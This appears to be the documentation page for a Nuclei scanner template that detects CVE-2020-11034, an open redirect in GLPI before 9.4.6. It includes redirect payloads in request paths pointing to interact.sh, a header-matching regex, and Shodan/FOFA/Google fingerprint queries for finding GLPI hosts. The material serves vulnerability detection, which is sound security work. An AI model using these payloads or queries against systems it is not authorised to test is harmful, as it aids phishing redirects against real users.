GLPI <9.4.6 - Open Redirect
ID: CVE-2020-11034
Severity: medium
Author: pikpikcu
Tags: cve,cve2020,redirect,glpi,glpi-project
Description
Section titled “Description”GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
YAML Source
Section titled “YAML Source”id: CVE-2020-11034
info: name: GLPI <9.4.6 - Open Redirect author: pikpikcu severity: medium description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp. impact: | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: Upgrade to version 9.4.6 or later. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 - https://lists.fedoraproject.org/archives/list/[email protected]/message/5WQMONZRWLWOXMHMYWR7A5Q5JJERPMVC/ - https://lists.fedoraproject.org/archives/list/[email protected]/message/Q4BG2UTINBVV7MTJRXKBQ26GV2UINA6L/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-11034 cwe-id: CWE-601,CWE-185 epss-score: 0.00381 epss-percentile: 0.70139 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: glpi-project product: glpi shodan-query: - http.title:"glpi" - http.favicon.hash:"-1474875778" fofa-query: - icon_hash="-1474875778" - title="glpi" google-query: intitle:"glpi" tags: cve,cve2020,redirect,glpi,glpi-project
http: - method: GET path: - '{{BaseURL}}/index.php?redirect=/\/interact.sh/' - '{{BaseURL}}/index.php?redirect=//interact.sh'
matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'# digest: 4a0a00473045022100adb572ed253d10de23a0532d8f05910eadc039ee6765869747889af2ef85492b02205de7d2c51fef1edb7abc640cc2837765f3a16d492e4b3afe150e90a1a9768dc0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-11034.yaml"